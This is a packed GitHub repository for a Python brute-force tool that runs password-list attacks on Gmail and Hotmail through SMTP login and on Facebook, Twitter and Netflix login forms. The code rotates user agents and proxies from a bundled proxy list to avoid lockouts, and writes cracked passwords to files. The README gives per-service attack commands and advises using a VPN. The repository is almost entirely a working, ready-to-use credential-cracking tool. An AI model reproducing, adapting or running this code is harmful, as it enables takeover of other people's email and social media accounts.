├── .github └── FUNDING.yml ├── .gitignore ├── Brute_Force.py ├── LICENSE ├── Proxy-List.txt ├── README.md └── _config.yml /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # 2 | custom: https://www.paypal.me/Hijap 3 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | MANIFEST 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other 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.spyproject 96 | 97 | # Rope project settings 98 | .ropeproject 99 | 100 | # mkdocs documentation 101 | /site 102 | 103 | # mypy 104 | .mypy_cache/ 105 | -------------------------------------------------------------------------------- /Brute_Force.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import smtplib 4 | import threading 5 | from optparse import * 6 | import time 7 | try : 8 | from proxylist import ProxyList 9 | except: 10 | print("pip3 install proxylist ") 11 | try : 12 | from mechanize import Browser 13 | except: 14 | print("pip3 install mechanize") 15 | from os import * 16 | import sys 17 | import logging 18 | import io 19 | import random 20 | try: 21 | import cookielib 22 | except: 23 | import http.cookiejar as cookielib 24 | try: 25 | import mechanize 26 | except: 27 | print("pip3 install mechanize ") 28 | R = '\033[31m' # red 29 | G = '\033[32m' # green 30 | W = '\033[0m' # white (normal) 31 | use = OptionParser("""{} 32 | _____________________ _____________________ 33 | `-._: .:' `::: .:\ |\__/| /:: .:' `::: .:.-' 34 | \ : \ |: | / : / 35 | \ :: . `-_______/ :: \_______-' . :: . / 36 | | : :: ::' : :: ::' : :: ::' :: ::' : :: :| 37 | | ;:: ;:: ;:: ;:: ;:: | 38 | | .:' `::: .:' `::: .:'Ksa`::: .:' `::: .:' `:| 39 | / : : : : : \ 40 | /______::_____ :: . :: . :: _____._::____\ 41 | `----._:: ::' : :: ::' _.----' 42 | `--. ;:: .--' 43 | `-. .:' .-' 44 | \ / https://github.com/Matrix07ksa/ 45 | Hejab_Zaeri 46 | \ / 47 | \/ 48 | {} 49 | ----------------------------------------------------------------------- 50 | -g --gmail ACCOUNT gmail @gmail.com 51 | -t --hotmail ACCOUNT hotmail @hotmail.com 52 | -T --twitter ACCOUNT twitter @ 53 | -f --facebook ACCOUNT facebook @ 54 | -n --netflix Account Netflix @ 55 | -l --list List Password BrutoForce 56 | -p --password Single Password 57 | -X --proxy Proxy list 58 | 59 | 60 | """.format(G,R)) 61 | 62 | use.add_option("-g","--gmail",dest="gmail",help="Write Your Account gmail") 63 | use.add_option("-t","--hotmail",dest="hotmail",help="Write Your Account hotmail") 64 | use.add_option("-T","--twitter",dest="twitter",help="Write Your Account twitter") 65 | use.add_option("-f","--facebook",dest="facebook",help="Write Your Account facebook") 66 | use.add_option("-n","--netflix",dest="netflix",help="Write Your Account Netflix") 67 | use.add_option("-l","--list",dest="list_password",help="Write Your list passowrd") 68 | use.add_option("-p","--password",dest="password",help="Write Your passowrd ") 69 | use.add_option("-X","--proxy",dest="proxy",help="Proxy list ") 70 | (options,args) = use.parse_args() 71 | 72 | brows = Browser() 73 | brows.set_handle_robots(False) 74 | brows._factory.is_html = True 75 | brows.set_cookiejar(cookielib.LWPCookieJar()) 76 | useragents = [ 77 | 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.19) Gecko/20081202 Firefox (Debian-2.0.0.19-0etch1)', 78 | 'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54', 79 | 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11', 80 | 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.6 (KHTML, like Gecko) Chrome/16.0.897.0 Safari/535.6'] 81 | brows.addheaders = [('User-agent',random.choice(useragents))] 82 | brows.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1) 83 | proxyList = options.proxy 84 | #Coding Function Proxy 0xAbdullah 85 | def proxy(): 86 | logging.basicConfig() 87 | pl = ProxyList() 88 | try: 89 | pl.load_file(proxyList) 90 | except: 91 | sys.exit('[!] Proxy File format has incorrect | EXIT...') 92 | pl.random() 93 | getProxy = pl.random().address() 94 | brows.set_proxies(proxies={"https": getProxy}) 95 | try: 96 | checkProxyIP = brows.open("https://api.ipify.org/?format=raw", timeout=10) 97 | except: 98 | return proxy() 99 | 100 | def Netflix(): 101 | password_list = io.open(options.list_password,"r").readlines() 102 | try_login = 0 103 | print("\r Netflix Account: {}".format(options.netflix)) 104 | print("%s<<<<<<+++++Start Attacking Email+++++>>>>>%s"%(R,W)) 105 | for password in password_list: 106 | password = password.rstrip('\n') 107 | try_login += 1 108 | if try_login == 10: 109 | try_login = 0 110 | proxy() 111 | print('\rPassword [==] {} '.format(password).rstrip("\n")) 112 | sys.stdout.flush 113 | url = "https://www.netflix.com/sa/login" 114 | try: 115 | brows.open(url, timeout=10) 116 | brows.select_form(nr=0) 117 | brows.form['userLoginId'] = options.netflix 118 | brows.form['password'] = password 119 | brows.method = "POST" 120 | submit = brows.submit() 121 | 122 | if 'https://www.netflix.com/browse' in submit.geturl(): 123 | print("{}[True][+] Password Found [{}][+]".format(G,password)) 124 | Save = io.open("Netflix.txt","a").write("Account Netflix:"+options.netflix+"\t\tPassword:"+password+"\n") 125 | break 126 | else : 127 | print("%s[!] False Login Password%s\n"%(R,W)) 128 | except: 129 | print('[!] <<>> \n') 130 | proxy() 131 | 132 | 133 | 134 | def facebook(): 135 | password_list = io.open(options.list_password,"r").readlines() 136 | try_login = 0 137 | print("\rFacebook Account: {}".format(options.facebook)) 138 | print("%s<<<<<<+++++Start Attacking Email+++++>>>>>%s"%(R,W)) 139 | for password in password_list: 140 | password = password.rstrip('\n') 141 | try_login += 1 142 | if try_login == 10: 143 | try_login = 0 144 | proxy() 145 | print('\rPassword [==] {} '.format(password).rstrip("\n")) 146 | sys.stdout.flush 147 | url = "https://ar-ar.facebook.com/login" 148 | try: 149 | brows.open(url, timeout=5) 150 | brows.select_form(nr=0) 151 | brows.form['email'] = options.facebook 152 | brows.form['pass'] = password 153 | brows.method = "POST" 154 | submit = brows.submit() 155 | if 'https://www.facebook.com/?sk=welcome' in submit.geturl(): 156 | print("{}[True][+] Password Found [{}][+]".format(G,password)) 157 | Save = io.open("Facebook.txt","a").write("Account Facebook:"+options.facebook+"\t\tPassword:"+password+"\n") 158 | break 159 | else : 160 | print("%s[!] False Login Password%s\n"%(R,W)) 161 | except: 162 | print('[!] <<>> \n') 163 | proxy() 164 | 165 | 166 | 167 | def twitter(): 168 | password_list = io.open(options.list_password,"r").readlines() 169 | try_login = 0 170 | print("\rTwitter Account: {}".format(options.twitter)) 171 | print("%s<<<<<<+++++Start Attacking Email+++++>>>>>%s"%(R,W)) 172 | for password in password_list: 173 | password = password.rstrip('\n') 174 | try_login += 1 175 | if try_login == 10: 176 | try_login = 0 177 | proxy() 178 | print('\rPassword [==] {} '.format(password).rstrip("\n")) 179 | sys.stdout.flush 180 | url = "https://mobile.twitter.com/login" 181 | try: 182 | brows.open(url, timeout=5) 183 | brows.select_form(nr=0) 184 | brows.form['session[username_or_email]'] = options.twitter.strip() 185 | brows.form['session[password]'] = password 186 | brows.method = "POST" 187 | submit = brows.submit() 188 | if submit.geturl() == "https://mobile.twitter.com/": 189 | print("{}[True][+] Password Found [{}][+]".format(G,password)) 190 | Save = io.open("Twitter.txt","a").write("Account Twitter:"+options.twitter+"\t\tPassword:"+password+"\n") 191 | break 192 | elif submit.geturl() == "https://mobile.twitter.com/home": 193 | print("{}[True][+] Password Found [{}][+]".format(G,password)) 194 | Save = io.open("Twitter.txt","a").write("Account Twitter:"+options.twitter+"\t\tPassword:"+password+"\n") 195 | break 196 | elif 'https://mobile.twitter.com/account/login_challenge' in submit.geturl(): 197 | print("{}[True][+] Password Found [{}][+]".format(G,password)) 198 | Save = io.open("Twitter.txt","a").write("Account Twitter:"+options.twitter+"\t\tPassword:"+password+"\n") 199 | break 200 | elif 'https://mobile.twitter.com/account/locked' in submit.geturl(): 201 | proxy() 202 | else: 203 | print("%s[!] False Login Password%s\n"%(R,W)) 204 | except: 205 | print('[!] <<>> \n') 206 | proxy() 207 | 208 | if options.gmail == None : 209 | if options.hotmail == None : 210 | if options.twitter == None: 211 | if options.facebook == None: 212 | if options.netflix == None : 213 | print(use.usage) 214 | exit() 215 | elif options.hotmail != None or options.gmail == None: 216 | smtp_srverH= smtplib.SMTP('smtp.live.com', 587) 217 | smtp_srverH.ehlo() 218 | smtp_srverH.starttls() 219 | if options.password != None or options.list_password == None : 220 | print("%s<<<<<<+++++Start Attacking Email+++++>>>>>%s"%(R,W)) 221 | try : 222 | smtp_srverH.login(options.hotmail,options.password) 223 | print("Found Password :{} \t Found Hotmail:{}".format(options.password,options.hotmail)) 224 | Save = io.open("Hotmail.txt","a").write("Account Hotmail:"+options.hotmail+"\t\tPassword:"+options.password+"\n") 225 | except : 226 | print("Not Found Password : {} \t Email Hotmail:{}".format(options.password,options.hotmail)) 227 | elif options.list_password !=None or options.password == None : 228 | password_list = io.open(options.list_password,"r").readlines() 229 | for password in password_list: 230 | try : 231 | print("%s<<<<<<+++++Start Attacking Email+++++>>>>>%s"%(R,W)) 232 | smtp_srverH.login(options.hotmail,password) 233 | print("FOUND Password :{} \n Found Hotmail:{}".format(password,options.hotmail)) 234 | Save = io.open("Hotmail.txt","a").write("Account Hotmail:"+options.hotmail+"\t\tPassword:"+password+"\n") 235 | except smtplib.SMTPAuthenticationError: 236 | print("Not Found Password : {} \t Email Hotmail:{}".format(password,options.hotmail)) 237 | if options.twitter != None : 238 | hejab = threading.Thread(target=twitter,name="hejab") 239 | hejab.start() 240 | if options.facebook != None : 241 | facebook = threading.Thread(target=facebook,name="facebook") 242 | facebook.start() 243 | if options.netflix != None: 244 | netflix = threading.Thread(target=Netflix,name="Netflix") 245 | netflix.start() 246 | 247 | 248 | elif options.gmail !=None or options.hotmail== None or options.twitter==None: 249 | smtp_srverG= smtplib.SMTP('smtp.gmail.com', 587) 250 | smtp_srverG.ehlo() 251 | smtp_srverG.starttls() 252 | if options.password != None or options.list_password == None : 253 | print("%s<<<<<<+++++Start Attacking Email+++++>>>>>%s"%(R,W)) 254 | try : 255 | smtp_srverG.login(options.gmail,options.password) 256 | print("Found Password :{} \t Found Gmail:{}".format(options.password,options.gmail)) 257 | Save = io.open("Gmail.txt","a").write("Account Gmail:"+options.gmail+"\t\tPassword:"+options.password+"\n") 258 | except : 259 | print("Not Found Password : {} \t Email Gmail:{}".format(options.password,options.gmail)) 260 | elif options.list_password !=None: 261 | password_list = io.open(options.list_password,"r").readlines() 262 | for password in password_list: 263 | password = password.rstrip("\n") 264 | print("%s<<<<<<+++++Start Attacking Email+++++>>>>>%s"%(R,W)) 265 | try : 266 | smtp_srverG.login(options.gmail,password) 267 | print("{}<<<+++Found Password :{} \t Found Gmail:{}+++>>>".format(G,password,options.gmail)) 268 | Save = io.open("Gmail.txt","a").write("Account Gmail:"+options.gmail+"\t\tPassword:"+password+"\n") 269 | break 270 | except smtplib.SMTPAuthenticationError: 271 | print("{}<<<---Not Found Password : {} \t Email Gmail:{}--->>>".format(R,password,options.gmail)) 272 | 273 | else: 274 | print(use.usage) 275 | exit() 276 | ############################################################THE END#################################################################### 277 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is 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272 | 212.172.74.14:443 273 | 188.129.161.55:36631 274 | 82.114.92.122:48795 275 | 78.157.254.42:3128 276 | 31.217.219.214:32484 277 | 82.81.169.142:80 278 | 89.218.5.109:46462 279 | 207.246.127.153:3128 280 | 95.38.210.98:8080 281 | 67.205.171.99:8080 282 | 139.5.132.245:8080 283 | 142.93.207.141:21 284 | 200.216.115.10:8080 285 | 200.5.32.211:8080 286 | 36.67.96.7:37554 287 | 95.214.62.31:3128 288 | 82.64.80.12:80 289 | 13.58.37.5:3128 290 | 182.93.75.105:8080 291 | 216.169.73.65:54785 292 | 161.49.186.218:8080 293 | 39.98.251.78:3128 294 | 115.85.76.150:8080 295 | 73.239.197.175:8080 296 | 118.136.170.164:8080 297 | 159.192.234.43:8080 298 | 118.91.175.210:8080 299 | 103.114.21.18:8080 300 | 51.77.162.148:3128 301 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Brute_Force 2 | [![Python 3.7](https://img.shields.io/badge/Python-3.7-blue.svg)](http://www.python.org/download/) 3 | [![GPL](https://img.shields.io/badge/GPL-V3.0-red.svg)](https://www.gnu.org/licenses/gpl-3.0.html) 4 | [![Termux](https://img.shields.io/badge/Termux-Android-brightgreen.svg)](https://termux.com/) 5 | ![platform](https://img.shields.io/badge/Platform-Linux%7CMacOS%7CWindows-brightgreen.svg) 6 | ![Twitter](https://img.shields.io/twitter/follow/Matrix0700.svg?style=social&label=Follow) 7 | ![alt text](https://1.bp.blogspot.com/-oPEVZN0ymsc/XS59nlfrrgI/AAAAAAAAPmI/5TsU1GjCzsE32ognWuV1xI-5jUvLjCkdgCLcBGAs/s1600/Brute_Force_1.png) 8 | ![alt text](https://1.bp.blogspot.com/-SIeGPGxLUWQ/XS59nkXfYEI/AAAAAAAAPmM/P0-rKgkEjm0iFTrhpwhxBAV7vAKAo0KPQCLcBGAs/s1600/Brute_Force_2.png) 9 | ## install : 10 | ```bash 11 | sudo apt install python3 python3-pip 12 | 13 | pip3 install proxylist 14 | 15 | pip3 install mechanize 16 | ``` 17 | 18 | 19 | # Usage: 20 | 21 | ## BruteForce Gmail Attack 22 | ```bash 23 | python3 Brute_Force.py -g Account@gmail.com -l File_list 24 | 25 | python3 Brute_Force.py -g Account@gmail.com -p Password_Single 26 | ``` 27 | 28 | 29 | ## BruteForce Hotmail Attack 30 | ```bash 31 | python3 Brute_Force.py -t Account@hotmail.com -l File_list 32 | 33 | python3 Brute_Force.py -t Account@hotmail.com -p Password_Single 34 | ``` 35 | 36 | 37 | ## BruteForce Twitter Attack 38 | 39 | ```bash 40 | python3 Brute_Force.py -T Account_Twitter -l File_list 41 | python3 Brute_Force.py -T Account_Twitter -l File_list -X proxy-list.txt 42 | 43 | ``` 44 | ## BruteForce Facebook Attack 45 | 46 | ```bash 47 | python3 Brute_Force.py -f Account_facebook -l File_list 48 | python3 Brute_Force.py -f Account_facebook -l File_list -X proxy-list.txt 49 | ``` 50 | ## BruteForce Netflix Attack 51 | 52 | ```bash 53 | يفضل تشغيل VPN 54 | Start On Vpn 55 | python3 Brute_Force.py -n Account_Netflix -l File_list 56 | python3 Brute_Force.py -n Account_Netflix -l File_list -X proxy-list.txt 57 | 58 | 59 | وترقبووو المزيد 60 | ``` 61 | 62 | 63 | 64 | -------------------------------------------------------------------------------- /_config.yml: -------------------------------------------------------------------------------- 1 | theme: jekyll-theme-hacker --------------------------------------------------------------------------------